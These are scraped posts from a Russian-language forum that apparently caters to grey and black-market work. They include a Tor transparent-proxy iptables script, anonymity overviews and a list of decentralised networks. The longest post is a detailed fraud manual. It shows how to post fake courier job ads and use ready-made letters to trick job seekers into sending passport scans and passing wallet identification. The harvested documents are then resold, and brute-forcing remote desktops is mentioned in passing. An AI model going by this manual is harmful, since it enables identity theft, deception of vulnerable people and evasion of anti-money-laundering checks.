#!/bin/sh # ### Set variables # The UID that Tor runs as (varies from system to system) _tor_uid="111" #As per assumption #_tor_uid=`id -u debian-tor` #Debian/Ubuntu #_tor_uid=`id -u tor` #ArchLinux/Gentoo # Tor's TransPort _trans_port="9040" # Tor's DNSPort _dns_port="5353" # Tor's VirtualAddrNetworkIPv4 _virt_addr="10.192.0.0/10" # LAN destinations that shouldn't be routed through Tor _non_tor="127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16" # Other IANA reserved blocks (These are not processed by tor and dropped by default) _resv_iana="0.0.0.0/8 100.64.0.0/10 169.254.0.0/16 192.0.0.0/24 192.0.2.0/24 192.88.99.0/24 198.18.0.0/15 198.51.100.0/24 203.0.113.0/24 224.0.0.0/4 240.0.0.0/4 255.255.255.255/32" ### Don't lock yourself out after the flush #iptables -P INPUT ACCEPT #iptables -P OUTPUT ACCEPT ### Flush iptables iptables -F iptables -t nat -F ### *nat OUTPUT (For local redirection) # nat .onion addresses iptables -t nat -A OUTPUT -d $_virt_addr -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports $_trans_port # nat dns requests to Tor iptables -t nat -A OUTPUT -d 127.0.0.1/32 -p udp -m udp --dport 53 -j REDIRECT --to-ports $_dns_port # Don't nat the Tor process, the loopback, or the local network iptables -t nat -A OUTPUT -m owner --uid-owner $_tor_uid -j RETURN iptables -t nat -A OUTPUT -o lo -j RETURN # Allow lan access for hosts in $_non_tor for _lan in $_non_tor; do iptables -t nat -A OUTPUT -d $_lan -j RETURN done for _iana in $_resv_iana; do iptables -t nat -A OUTPUT -d $_iana -j RETURN done # Redirect all other pre-routing and output to Tor's TransPort iptables -t nat -A OUTPUT -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports $_trans_port ### *filter INPUT # Don't forget to grant yourself ssh access from remote machines before the DROP. #iptables -A INPUT -p tcp --dport 22 -m state --state NEW -j ACCEPT iptables -A INPUT -m state --state ESTABLISHED -j ACCEPT iptables -A INPUT -i lo -j ACCEPT # Allow INPUT from lan hosts in $_non_tor # Uncomment these 3 lines to enable. #for _lan in $_non_tor; do # iptables -A INPUT -s $_lan -j ACCEPT #done # Log & Drop everything else. Uncomment to enable logging #iptables -A INPUT -j LOG --log-prefix "Dropped INPUT packet: " --log-level 7 --log-uid iptables -A INPUT -j DROP ### *filter FORWARD iptables -A FORWARD -j DROP ### *filter OUTPUT iptables -A OUTPUT -m state --state INVALID -j DROP iptables -A OUTPUT -m state --state ESTABLISHED -j ACCEPT # Allow Tor process output iptables -A OUTPUT -m owner --uid-owner $_tor_uid -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -m state --state NEW -j ACCEPT # Allow loopback output iptables -A OUTPUT -d 127.0.0.1/32 -o lo -j ACCEPT # Tor transproxy magic iptables -A OUTPUT -d 127.0.0.1/32 -p tcp -m tcp --dport $_trans_port --tcp-flags FIN,SYN,RST,ACK SYN -j ACCEPT # Allow OUTPUT to lan hosts in $_non_tor # Uncomment these 3 lines to enable. #for _lan in $_non_tor; do # iptables -A OUTPUT -d $_lan -j ACCEPT #done # Log & Drop everything else. Uncomment to enable logging #iptables -A OUTPUT -j LOG --log-prefix "Dropped OUTPUT packet: " --log-level 7 --log-uid iptables -A OUTPUT -j DROP ### Set default policies to DROP iptables -P INPUT DROP iptables -P FORWARD DROP iptables -P OUTPUT DROP ### Set default policies to DROP for IPv6 ip6tables -P INPUT DROP ip6tables -P FORWARD DROP ip6tables -P OUTPUT DROP

В 6-ой строке где написано _tor_uid= "111" #As per assumption надо заменить tor_uid на свой
Чтобы узнать свой ID, в терминале
$ nano /etc/passwd

или просто по пути /etc/passwd в строке начинающейся с debian-tor первые 3 цифры ваш id

Сохраняем эту байду и в терминале запускаем этот файл
$ sudo sh iptables.sh

Перезагружаем тор
$ sudo /etc/init.d/tor restart

Здесь проверяемся настроен ли сам tor: check.torproject.org должны увидеть надпись Congratulations.
Для проверки dns идём на dnsleaktest и жмём Extended test, тут явно не должно быть вашего города и провайдера

Если всё работает, то при желании прописываемся в автозагрузку:

Сохраним правила iptables в файл run_tor
$ sudo iptables-save > run_tor

Открываем файл /etc/rc.local и перед exit 0 вставляем:
**iptables-restore < run_tor **

Чтобы снести все правила iptables и вернуться к тому с чего начинали то можно поискать по правилам:

sudo iptables -L / sudo iptables -S либо с другими ключами и ручками всё исправить, это если у вас уже настроенный фаервол, если нет то тупо в /home создаёте файл virgin.sh с содержимым:

Bash:Copy to clipboard

#!/bin/sh echo "Stopping firewall and allowing everyone..." iptables -F iptables -X iptables -t nat -F iptables -t nat -X iptables -t mangle -F iptables -t mangle -X iptables -P INPUT ACCEPT iptables -P FORWARD ACCEPTтф iptables -P OUTPUT ACCEPT

Который запускаете также в терминале и который вернёт все настройки к девственным , затем если вы просто залочили файл resolv.conf то в терминале:
$ sudo chattr -i /etc/resolv.conf

Если вы создали файл dns.conf то просто удаляем его:
$ sudo rm -f /etc/NetworkManager/conf.d/dns.conf

Также можно добавить в файл настроек тора /etc/tor/torrc чтобы исключить exit-ноды стран СНГ строку:
ExcludeExitNodes {RU},{UA},{BY}

Советую установить утилиту Arm (anonymizing relay monitor) которая позволяет отслеживать активность, редактировать настройки tor'a.

Это всё конечно не панацея, но уже не большой шаг в её направлении.
В любом случае будьте осторожны, т.к. протоколы, отличные от tcp/udp будут ходить в обход tor, поэтому или сразу запретите их в iptables, или не используйте.

Всё, что ты хотел знать об анонимности

ID: 676533bbb4103b69df371d84
Thread ID: 27130
Created: 2019-01-04T12:03:29+0000
Last Post: 2019-01-04T12:03:29+0000
Author: Hide
Replies: 0 Views: 2K

Привет, друг! Сколько раз мы говорили и еще будем говорить об анонимности. Я хочу, чтобы вы усвоили, что государство ведет войну против нас и мы не должны отставать. К тому же, каждый имеет право быть анонимным и выражать свое мнение хотя бы в интернете.
Чтобы было проще, разделим анонимность в Интернте на два направления:

«Социальная анонимность» — это то, что человек сам осознанно или неосознанно рассказывает о себе в Сети.

«Техническая анонимность» — когда утечка деанонимизирующих данных связана с используемыми техническими средствами и приложениями.

Мы сконцентрируемся именно на Технической анонимности.

необходимость настройки прокси-сервера для каждого приложения либо использование отдельных программ-соксификаторов, например, Proxifier.

VPN/SSH

Я буду говорить о VPN, подразумевая также и SSH-туннели. Так как, несмотря на некоторые различия, основной принцип у них одинаков.

Практически все коммерческие VPN-провайдеры предлагаю выбор из двух протоколов: OpenVPN и PPTP. Реже предлагается протокол L2TP+IPSec. И совсем единицы предлагают протокол SSTP.
Отдельно стоит отметить сервисы, предоставляющие «DoubleVPN», когда перед тем, как выйти в Интернет, трафик проходит 2 разных VPN-сервера в разных странах, или даже «QuadVPN», когда используется 4 сервера, которые пользователь может выбрать сам и расположить в произвольном порядке.

Плюсы VPN/SSH:

быстро и удобно, не надо отдельно настраивать приложения.

Минусы VPN/SSH:

нужно доверять VPN/SSH-серверу/провайдеру.

Отмечу, что большинство тематических дополнений для браузеров и «программ для анонимности» используют в своей основе именно прокси-серверы и VPN-серверы для скрытия ip-адреса клиента.

Tor. Великий и ужасный

О Tor говорилось уже много, но я попытаюсь рассказать просто

Tor — это система маршрутизаторов, в которой клиент соединяется с Интернетом через цепочку узлов. Как правило, цепочка состоит из трех узлов, каждому из них неизвестны адреса клиента и ресурса одновременно. Кроме того, Tor шифрует сообщения отдельно для каждого узла, а открытый трафик виден только выходному роутеру.
Сейчас Tor — это 10 авторитетных (управляющих) узлов, около 4200 узлов- посредников, в том числе примерно 900 выходных узлов.

Отмечу, что обратно траффик идет в открытом виде, на выходном узле он зашифровывается временным симметричным ключом и передается по цепочке (да-да, непосредственно сам траффик шифруется на симметричных ключах, а эти ключи шифруются уже на ассиметричных ключах).

Плюсы Tor:

высокая степень анонимности клиента при соблюдении всех правил;

простота использования (скачал Tor Browser Bundle, запустил и пользуйся).

Минусы Tor:

выходной траффик прослушивается;

низкая скорость;

наличие управляющих серверов.

Работу Tor неизменно сопровождают сомнения людей в его надежности и анонимности. Сейчас мы не будем его подробно разбирать.
I2P

Про I2P было сказано много слов, буду лаконичен и постараюсь объяснить все наглядно.
I2P — это анонимная сеть, работающая поверх Интернета. В ней есть свои сайты, форумы и другие сервисы. По своей архитектуре она полностью децентрализована, также в I2P нигде не используются ip-адреса.
В I2P есть два главных понятия:

«туннель» – это временный однонаправленный путь через некоторый список узлов. Туннели бывают входящие и исходящие;

«сетевая база NetDb», которая в той или иной мере распределена по всем клиентам I2P. Её цель – хранение информации о том, как клиенту соединиться с определенным адресатом.

База NetDb хранит в себе:

RouterInfos – контактные данные роутеров (клиентов), используются для построения туннелей (упрощая, они представляют собой криптографические идентификаторы каждого узла);

LeaseSets – контактные данные адресатов, используются для связи исходящих и входящих туннелей.

Плюсы I2P:

высокая степень анонимности клиента;

полная децентрализация, что ведёт к устойчивости сети;

конфиденциальность данных: сквозное шифрование между клиентом и адресатом.

Минусы I2P:

низкая скорость;

«свой Интернет».

Иные средства
На самом деле существовали и существуют десятки отдельных проектов, посвященных анонимности в Интернете, это не считая «дополнений в браузерах» и «программ для анонимности». Просто другие, менее популярные, решения либо уже скомпрометированы, либо еще не так популярны, а следовательно — и не изучены мировым экспертным сообществом, чтобы говорить об их достаточной надежности. Сейчас активно развиваются следующие наиболее перспективные проекты:

Freenet freenetproject.org

GNUnet gnunet.org

JAP (Он же — John Donym, в основе — Tor) anon.inf.tu-dresden.de/index_en.html

RetroShare retroshare.sourceforge.net

Perfect Dark www21.atwiki.jp/botubotubotubotu

Что хотелось бы дополнить - для каждого человека разные пороги и планки анонимности. Кому то достаточно и VPN , а кому-то нужны дедики, соксы и связка с Тором. Именно поэтому начинайте с малого и никуда не спешите - у каждого есть право на анонимность.

Альтернативный интернет

ID: 676533bbb4103b69df371d86
Thread ID: 27122
Created: 2019-01-03T18:23:28+0000
Last Post: 2019-01-03T18:23:28+0000
Author: Hide
Replies: 0 Views: 2K

В связи с тотальной прослушкой интернет-каналов и стукачеством коммерческих интернет-компаний сейчас особенно остро стоит вопрос о мерах противодействия. Для пользователя самый эффективный вариант — использование криптографических инструментов и децентрализованных сервисов.
Ниже представлена подборка доступных способов анонимизации и защиты своих прав.

AnoNet
AnoNet — децентрализованная сеть между друзьями с использованием VPN и программных BGP-маршрутизаторов.
Bitcoin
Bitcoin — криптовалюта.
BitPhone
BitPhone — мобильное коммуникационное устройство, работающее на базе децентрализованной сети в стиле Bitcoin.
BitMessage
BitMessage — коммуникационный протокол P2P, используемый для обмена зашифрованными сообщениями от одного пользователя ко многим подписчикам.
Commotion Wireless
Commotion Wireless open source коммуникационный инструмент, работающий на мобильных телефонах, компьютерах и других беспроводных устройствах для создания децентрализованных mesh-сетей.
Cryptosphere
Cryptosphere — распределенное зашифрованное облачное хранилище на базе модели данных Git.
Drogulus
Drogulus (WIP) — программируемое P2P-хранилище данных с поддержкой криптографии.
Сеть eDonkey (eD2k)
Сеть eDonkey — файлообменная децентрализованная сеть для обмена большими файлами.
Freenet
Freenet — свободное программное обеспечения для анонимного обмена файлами, публикации сайтов (доступны только через Freenet), чатов и форумов.
Freifunk
Freifunk — некоммерческая инициатива по созданию свободной децентрализованной mesh-сети. Прошивки Freifunk основаны на OpenWRT и OLSR или B.A.T.M.A.N.
GNUnet
GNUnet — фреймворк для безопасных peer-to-peer коммуникаций без использования центральных или промежуточных серверов.
Grimwire
Grimwire — браузерное приложение, которое использует Web Workers для изоляции процессов и WebRTC для peer-to-peer коммуникаций.
Guifi
Guifi — европейская (преимущественно, испанская) большая mesh-сеть с более чем 22000 активными узлами WiFi и 25 км оптоволокна.
I2P
I2P — анонимизирующая сеть, использующая несколько уровней шифрования.
Kademlia
Kademlia — распределенная хэш-таблица для P2P-сетей.
NameCoin
NameCoin — распределенная система DNS на технологии Bitcoin.
Nightweb
Nightweb — экспериментальное приложение для Android или ПК, которое позволяет публиковать контент и общаться через BitTorrent поверх I2P.
LibreVPN
LibreVPN — виртуальная mesh-сеть с конфигурационными скриптами, позволяющими поднять собственный mesh-VPN.
OpenNIC
OpenNIC Project — открытый и демократичный альтернативный DNS-провайдер.
Osiris
Osiris — ПО для децентрализованного портала, управляемого и работающего по P2P.
PeerCDN
PeerCDN — автоматически раздает статичные ресурсы на сайте (изображения, видео, файлы) через P2P-сеть, составленную из посетителей, который в данный момент находятся на сайте.
PeerCoin/PPCoin
PeerCoin/PPCoin — первая криптовалюта, основанная на реализации одновременно систем proof-of-stake и proof-of-work.
PeerServer
PeerServer — пиринговая клиент-серверная технология, с использованием WebRTC, где ваш браузер работает как сервер для других браузеров через пиринговые P2P-каналы WebRTC.
Phantom
Phantom — система децентрализованной интернет-анонимности.
Project Byzantium
Project Byzantium — Linux-дистрибутив с поддержкой беспроводных mesh-сетей, который обеспечит связь в случае стихийного бедствия или аварии интернет-провайдера.
Project Meshnet
Project Meshnet ставит целью создание устойчивого децентрализованного альтернативного интернета.
Quick mesh project
Quick mesh project — прошивка на базе OpenWRT для создания mesh-сетей.
Retroshare
RetroShare — open source, децентрализованная коммуникационная платформа для чатов и обмена файлами.
Serval Project
Serval Project позволяет осуществлять звонки между мобильными телефонами без использования базовых станций.
Syndie
Syndie — open source система для поддержки распределенных форумов.
Tahoe-LAFS
Tahoe-LAFS — свободная распределенная файловая система с дублированием информации.
Tavern
Tavern — распределенная, анонимная невзламываемая сеть, защищенная от любого пользователя извне.
Telehash
Telehash — новый криптографический протокол на базе JSON, позволяющий быстро создавать защищенные P2P-приложения.
FNF
FNF — организация Free Network Foundation для информационной поддержки в создании локальных беспроводных сетей.
Tonika
Tonika — распределенная социальная сеть, в которой коммуникации осуществляются напрямую между друзьями.
Tor
Tor — многоступенчатая сеть анонимайзеров.
Tox
Tox — проект, ставящий целью создать P2P-альтернативу Skype.
Tribler
Tribler — проект по созданию интернета, свободного от цензуры, развивается уже восемь лет, создано экспериментальное приложение для Android.
Unhosted
Unhosted — бессерверные веб-приложения, которые исполняются в браузере клиента.
Vole
Vole — социальная сеть в браузере, без центрального сервера, использует Bittorrent, Go и Ember.js, а также Bittorrent Sync.
ZeroTier One
ZeroTier One — open source приложение для создания огромных распределенных Ethernet-сетей. Используется end-to-end шифрование для всего трафика. Есть коммерческая и бесплатная версия.

На Гитхабе опубликован еще более обширный список таких сервисов. Многие из них на слуху, а другие не так известны. Список пополняется.

Большой список User Agent's

ID: 676533bbb4103b69df371d88
Thread ID: 27098
Created: 2018-12-30T11:33:38+0000
Last Post: 2018-12-30T13:21:41+0000
Author: Xrenovi4
Replies: 3 Views: 2K

Не знаю верный раздел или нет, но если что перенесут.
Больший список user agent'ов , возможно кому пригодится.

Hidden content for authorized users.

https://developers.whatismybrowser.com/useragents/explore/

Полная верификация кошельков

ID: 676533bbb4103b69df371d89
Thread ID: 27058
Created: 2018-12-27T19:47:08+0000
Last Post: 2018-12-27T19:47:08+0000
Author: Hide
Prefix: Статья
Replies: 0 Views: 2K

Думаю, все сталкивались с тем, что при работе в интернете по серому и черному цвету, требуются кошельки (левые/анонимные) и когда сфера деятельности набирает оборот, то, соответственно, поднимается объем финансов, что влечет за собой необходимость идентификации.

Многие из вас уже научились пользоваться "sms сервисами" и уже успешно могут регистрировать себе кошельки.
Так же многие из вас научились делать идентификацию кошельков, что значительно придает привилегии вашим кошелькам и некоторые ограничения снимаются с них. Но идентификация не полная, а лишь выше минимальной. И чтобы пройти полную идентификацию, необходимо личное присутствие владельца кошелька.

В большинстве случаев, те кто предлагают идентификацию кошельков имеют "своих" людей в местах, где проводится данная операция и успешно ведут двухсторонний бизнес, предлагая пользователям теневых ресурсов идентификацию кошельков с одной стороны, а с другой успешно договариваются с людьми, которые находятся в таких центрах. Он вполне прибыльный, посмотрите на ценники таких кошельков и будете приятно удивлены.

Но не у каждого получается провернуть такое дело. В большинстве случаев там работают друзья, коллеги, одноклассники, товарищи, жена или теща. Поведаю вам пример того, как можно будет успешно делать идентификацию кошельков.

Все мы знаем о Федеральном законе от 07.08.2001 N 115-Ф3 "О противодействии легализации (отмыванию) доходов, полученных преступным путем" (с изм. и под.,вступ. в силу с 28.01.2018), в котором некоторые поправки вступили в этом году и даже на идентифицированных кошельках нужно теперь снова пройти идентификацию, дабы убрать лимиты в каких-то жалких 15000 рублей в месяц.
Кстати, давайте сразу о лимитах.

Яндекс.Деньги
Анонимный:
Можно хранить в кошельке : 15000₽
Лимит на платеж :
15 000₽ из кошелька
15 000₽ с привязанной карты
Лимит на снятие наличных с карты Яндекс.Денег : 5000₽
- Платежи по всему миру недоступны, только в России
- Переводы на банковскую карту
- Переводы в другой кошелек
- Переводы на банковский счет
- Переводы наличными через Western Union и Юнистрим

Именной:
Можно хранить в кошельке : 60 000₽
Лимит на платеж :
60 000₽ из кошелька
60 000₽ с привязанной карты
Лимит на снятие наличных с карты Яндекс.Денег : 5000₽
✔ Платежи по всему миру: в iTunes, Wargaming, Skype, обычных магазинах и кафе
✔ Переводы на банковскую карту
✔ Переводы в другой кошелек
- Переводы на банковский счет
- Переводы наличными через Western Union и Юнистрим

Идентифицированный:
Можно хранить в кошельке : 500 000 Р
Лимит на платеж :
250 000₽ из кошелька
100 000₽ с привязанной карты
Лимит на снятие наличных с карты Яндекс.Денег : 100 000₽
✔ Платежи по всему миру: в iTunes, Wargaming, Skype, обычных магазинах и кафе
✔ Переводы на банковскую карту
✔ Переводы в другой кошелек
✔ Переводы на банковский счет
✔ Переводы наличными через Western Union и Юнистрим

QIWI Wallet

Анонимный:
Допустимый остаток на балансе : 15 000₽
Ограничения на платежи : 40 000₽ в месяц
Снятие наличных с Карты QIWI: до 5 000₽ в день, до 20 000₽ в месяц
✔ Доступна оплата сотовой связи, интернета, ЖКУ, штрафов ГИБДД и других услуг.
- Недоступна оплата на сайтах зарубежных компаний: Wargaming, Steam, Skype, AliExpress и т. д.
- Недоступны переводы на другие кошельки, банковские счета и карты или через системы денежных переводов.

Основной:
Допустимый остаток на балансе: 60 000₽
Ограничения на платежи и переводы : 200 000₽ в месяц
Снятие наличных с Карты QIWI : до 5 000₽ в день, до 40 000₽ в месяц
✔ Доступна оплата сотовой связи, интернета, ЖКУ, штрафов ГИБДД и других услуг.
✔ Доступна оплата на сайтах зарубежных компаний: Wargaming, Steam, Skype, AliExpress и т. д.
✔ Доступны переводы на другие кошельки, банковские счета и карты или через системы денежных переводов.

Профессиональный:
Допустимый остаток на балансе : 600 000₽
Ограничения на платежи и переводы : Нет ограничений
Снятие наличных с Карты QIWI : до 100 000₽ в день, до 200 000₽ в месяц
✔ Доступна оплата сотовой связи, интернета, ЖКУ, штрафов ГИБДД и других услуг.
✔ Доступна оплата на сайтах зарубежных компаний: Wargaming, Steam, Skype, AliExpress и т. д.
✔ Доступны переводы на другие кошельки, банковские счета и карты или через системы денежных переводов.

Убрать минимальные лимиты можно при помощи обычных паспортных данных на самих сайтах сервиса электронных кошельков. У Яндекса это обычно сутки на рассмотрение. У Qiwi немного легче, но все равно, нам никак в таком случае не получить полную идентификацию кошелька.

Давайте решим, что нам будет нужно:
1. Это сим карты для регистрации кошельков.
Продаются они оптом по довольно-таки разным ценам (тут уж как вам повезет). Найти тех же продавцов можно на различных форумах. Так же пользуйтесь тем же Авито, где куча селлеров, торгующих сим картами.

2. Анонимность и безопасность.
Не буду останавливаться подробно на этом моменте, поскольку этот мануал не об этом и в интернете/на форумах есть куча информации в публичном доступе о том, как работать в сети безопасно и анонимно. Лишь подмечу, для чего нам нужна анонимность в этой теме.
Во-первых, никто даже представления не имеет, как именно будут пользоваться купленными у вас кошельками, а это значит, что лучше побеспокоиться о собственной безопасности в первую очередь (ваш IP останется в истории доступа к кошельку).
Во-вторых, открывать кошельки лучше будет под различными IP, чтоб потом, при жалобах на отдельные, ранее проданные вами кошельки, не заблокировали все одним разом, найдя их первого владельца по IP и другим косвенным моментам (cookie, уникальный «снимок» операционной системы и т.п.). Не забывайте чистить переодичски комп/операционку. А как актуальный вариант для работы, на мой взгляд - использовать дедик под RU. Один дедик = один кошелек. Продаются также на форумах. А если экономить деньгу, то можно брутить дедики самому, об этом процессе есть вся необходимая информация в паблике. Но не думаю, что в этом есть большой смысл.
Для меня более оптимальная схема безопасности, по многим вариантам направлений работ в сети, требующих анонимности:

Левая сим карта + Tor Трафик + Double VPN (NordVpn отлично справляется) на ноутбуке + можно еще и виртуалку запустить + дедик.

То есть IP, который вы будете оставлять = IP дедика (если там еще не включить Vpn), через который вы будете попадать в сеть.

Маленькие нюансы по дедику. На нем под тем же аккаунтом иногда сидят больше, чем один пользователь, по довольно-таки объяснимым причинам. Перед регистрацией нового кошелька хотя бы почистите ваш браузер от cookie/истории предыдущих пользователей. Идеально будет пользоваться дедиками с админ доступом (можно спокойно создать себе отдельную учетную запись и под ней сидеть/работать на дедике).
Дедики с админ доступом стоят чуть дороже обычных. Их привилегии вы, безусловно, ощутите в работе хотя бы на том моменте, что вас не будет выкидывать из дедика при входе другого пользователя под той же учеткой.

3. Электронная почта.
Вы сможете абсолютно спокойно сами зарегистрировать себе аккаунты для работы или же купить уже зарегистрированные почтовые аккаунты. На себестоимость работ по одному кошельку при верном подходе и закупке расходников будет уходить не больше 50 рублей + ваша работа/ваше личное время. Специально глубоко не раскрываю эти пункты по безопасности, впн, дедикам. Ведь каждый умеет пользоваться интернетом правильно. Все получится, главное - захотеть, а там и люди даже в космос летают.

Итак, плавно переходим непосредственно к самой работе.
Есть различные схемы создания идентифицированных кошельков, но я расскажу вам именно об одном наиболее простом для начинающих и менее затратном, а также более безопасном для дальнейшей участи кошельков, которые будут контролироваться только вами. Для регистрации идентифицированных кошельков нам с вами понадобятся разводные дропы (мамонты). Объясню. Это те люди, которые доверят вам свою приватную/личную информацию и выполнят все нужные вам действия за вас, не зная истинных целей.
Как их искать? Да тут проще простого, они сами вас найдут!
Вот к примеру, топаем на любой сайт по поиску/предложению работы (берем Авито) и создаем там свое объявление о приеме на работу. Создать надо такое объявление, чтоб на него повалил народ. Главное – не перегибайте палку в ваших обещаниях, иначе все это будет выглядеть слишком подозрительно и не правдоподобно.

Не используйте его прям дословно, будьте креативными и грамотными. А вообще, под это дело лучше будет создать свой сайт-магазин и там прописать свои контакты для более убедительного объявления. Когда человек будет гуглить вашу почту, он обязательно наткнется на сайт, это отобьет лишние сомнения у наших разводных мамонтов.

Очень крупному интернет магазину берите ваш вымышленный шоп или "забугор, который не прозвонят" по продаже эл.техники, нужны очень ответственные курьеры, для приема и последующего хранения, а в последствии и доставки товара покупателям. Оплата – 1000 рублей за доставку одного заказа. При доставке всего-то 3-4 заказов в день, вы уже сможете заработать от 100 000 рублей в месяц!

Использовать так же можно и объявления другого рода. Взять, к примеру, еще строителей (и подготовить для них сладкое обьявление), а тут уже все дело в вашей фантазии.

В поле "заработок" при подаче объявления смело вписывайте цифру 100000, для тех, кто ведет поиск и фильтрует предложения о работе по величине заработка. После того, как разместите бесплатное объявление на Авито, например: (Москва, Работа/Вакансии/Без опыта, студенты), то в первые сутки получите огромное количество писем от людей. И это при том, что объявление будет бесплатным и после добавления моментально улетит вниз. Из 100+ писем примерно 10% сконвертируются в (потенциально) идентифицированные кошельки. Можно увеличить "выхлоп", об этом немного позже.
Большинство написавших, конечно же, будет интересовать в первую очередь, что это за магазин, его адрес и какие требования нужны для работника.
Следующим письмом в ответ на запросы соискателей, может быть примерно таким (конечно же, желательно подробным, чтобы не затягивать переписку):

"Рады вас приветствовать!
Швейцарскому (берите другую страну, забугор) интернет магазину ссылка на ваш сайт, или забугор шоп, который не прозвонят требуются ответственные и серьезные менеджеры-курьеры для получения, а так же хранения и доставки заказов конечным покупателям. В мае этого года запланирован запуск локальной русской версии сайта нашего магазина и начнется активная реклама для русскоязычной аудитории. Нам будет необходимо организовать оперативно-быструю доставку заказов нашим покупателям с конечным получением денег от них, при передаче и проверке ими заказанного у нас товара.
Схема работы. Раз в неделю (или 14 дней) курьер получит от нашего магазина посылку с товаром (так сказать, мини-партию) и должен будет обеспечить сохранность товара и доставку индивидуальных заказов покупателям. От самого курьера не потребуется никаких залогов и предоплат.

Когда наш магазин получает заказ - отправляется смс курьеру (вам) с адресом нашего покупателя и описанием его заказа (количество, наименование). Курьер (вы) предварительно созваниваетесь с покупателем, договариваетесь на время и место передачи посылки. При дальнейшей передаче посылки курьер (вы), после проверки товара нашим покупателем, получает от него оплату за заказ, которую впоследствии передает нашему интернет магазину через удобный ему платежный сервис, сразу вычитая из полученной суммы 1 000 руб за свои услуги, предоставленные нам. По началу, приблизительно раз в неделю, вы будете получать небольшие посылки от нашего магазина (до 10 наименований, образно). Когда интернет магазин окончательно убедится в качестве и надежности ваших услуг, количество товара, соответственно, будет увеличиваться до того объема, который вас устраивает и вы справляетесь. Выполняя доставку, около 3-4 заказов в день, уже можно зарабатывать от 100 000 рублей в месяц.

С вами непосредственно будет заключен контракт, как с материально ответственным лицом, несущим ответственность за сохранность получаемого товара от магазина.
Начало работы планируется в августе месяце. Но формирование групп-курьеров происходит уже сейчас, так что если именно вы хотите попасть к нам в команду курьеров - будьте оперативны с принятием окончательного решения и пересылкой необходимой нам информации.
Поскольку офиса нашего магазина пока еще нет в вашем городе, контракт будет заключен дистанционно. От вас для включения в нашу команду курьеров необходима следующая информация:
1. Номер вашего мобильного телефона в формате +7хххххххххх.
2. Адрес вашего нынешнего проживания. В полном формате с указанием страны и области.
3. Цветной скан вашего паспорта (главный разворот и разворот с пропиской) и отдельная фотография вас с раскрытым паспортом в руке (так, чтобы было видно четко ваше лицо и главный разворот паспорта с фотографией и фамилией).
На основании представленных данных с вами будет заключен контракт. Так же в обязательном порядке будет необходима проверка (идентификация) вашей личности через специальный сервис в Евросети (детали об этом мы сообщим дополнительно). или указывайте центры сервиса КИВИ
Эти меры необходимы нам для полного обеспечения безопасности и снижения рисков нашей компании, поскольку курьеру(вам) под ответственное хранение будут переданы мини-партии товара общей стоимостью приблизительно в 5-10 тысяч евро или гривен, или рублей, делайте разумную цифру, без залогов и предоплат.
Я - менеджер проекта по развитию курьерской доставки заказов(товара) на территории Российской Федерации и все вопросы и необходимую информацию присылайте мне в ответ на данное письмо.
С наилучшим пожеланием!
Маргаретт Афанасьева, главный менеджер по локализации данного проекта курьерской доставки на территории РФ"

Тут намеренно были допущено повторение слов, дабы вы тупо не копировали текст. Продумайте, сделайте правдоподобным и раскрытым. Это поможет сразу отбросить ненужных людей.

После всего проделанного, от малой части людей моментально приходят сканы паспортов (не бегите сразу банчить паками документов, погодите, об этом позже), большинству из них же требуются различные дополнительные разъяснения. Более грамотных параноиков можно сразу исключить из дальнейшей обработки, скорее всего (а так и выйдет) только свое время потратите. Некоторым достаточно просто еще немного детальных (и важно, очень важно - грамотных) разъяснений по работе, объяснений, почему именно нужны документы, и они так же присылают сканы и соглашаются работать. Нюанс по адресу интернет магазина в данной схеме – лучше указывать какой-нибудь европейский (не английский) шоп, чтобы его не прозвонили умники и нужно объяснять людям о целенаправленном стремлении шопа буквально через месяц уже выйти на всероссийский рынок и оптимизировать свои расходы по логистике/доставке заказа конечному покупателю. Магазин должен продавать дорогой, но в тоже время востребованный товар, а-ля планшеты, айфоны и прочая электронная техника. В этом случае легко объяснимо высокое вознаграждение, которое получит курьер.

Теперь приступим ко второму этапу обработки и отвечаем уже тем, кто прислал нам сканы своих документов:
"Рады вам сообщить, Ваша кандидатура одобрена!
Осталось пройти идентификацию вас и вашего будущего счета (для передачи финансов, полученных от покупателей) в любом салоне Евросети или Киви.
От лица компании прошу понять правильно, наша компания не может выслать товар без полной проверки/идентификации личности получателя/курьера/менеджера. Стоимость мини партии товара, которую вы получите от нас для дальнейшего распространения конечным покупателям - 5-10 тысяч евро гривен, рублей, биткоинов. И вы получаете этот товар без каких-либо предоплат и залога.
Если вас устраивают наши окончательные условия, мы высылаем вам подробную инструкцию, как нужно пройти идентификацию личности в Евросети или киви.
С наилучшим пожеланием!
Маргаретт Афанасьева, главный менеджер по локализации данного проекта курьерской доставки на территории РФ."

Почему обработка мамонтов в данной схеме ведется именно в 2 этапа?
Потому что некоторых мамонтов моментально может отпугнуть идентификация счета и они просто откажутся ее делать. При этом у нас уже останутся их сканы документов, высланные ими же ранее, которые можно продать отдельно. И, кстати, в этой схеме можно легко расширить список доков и дополнить их, так скажем, сканом ИНН или СНИЛС, а для подтверждения его адреса проживания запросить сканы платежек коммунальных услуг/ЖКХ. Такие комплекты документов всегда пользуются спросом, все об этом знают. И более того, вы также можете сами их использовать для открытия и прохождения разных верификаций в других платежных сервисах/сайтах/казино, для личной работы.
Но если документы вам (и вашим покупателям кошельков) не понадобятся и кошельки в ваших схемах будут использоваться короткое время без риска получения блока, то данная схема упрощается во много раз и выхлоп (соотношение кол-ва кошельков и количества запросов) увеличивается, поскольку много отказов следует именно из-за необходимости выслать свои сканы доков. А сама идентификация проходит уже на сторонней и вполне известной площадке – Евросети или киви То есть, тем людям, которые отказываются прислать документы вам как непонятному лицу, предложите идентификацию без скана, через Евросеть или Киви. В этом случае вы просто получаете кошельки без документов, но такие кошельки, поверьте, ничем не хуже, чем кошельки с документами.

Подходим к финишной прямой
Самые наивные, если вы будете убедительны и, не устану повторяться, очень грамотны в своих ответах, присылают вам свое согласие на работу по всем вашим условиям.
Теперь вы сами топайте на сайт Яндекс.Деньги или Киви и сами/собственноручно регистрируете кошелек. Естественно, не забывайте про свою личную безопасность и про то, какой IP вы будете оставлять в логах у ЯД - Киви.
Если ЯД, то выбираете логин (можно будет использовать имя/фамилию, с добавлением цифр, например, года рождения).
Пароль – сложный, а не простой qwerty.
Мобильник – берем отдельную симку из уже заранее купленных нами и принимаем на нее смску, подтверждаем, введя уже полученный код.
Указываем имя и фамилию вашего дропа.
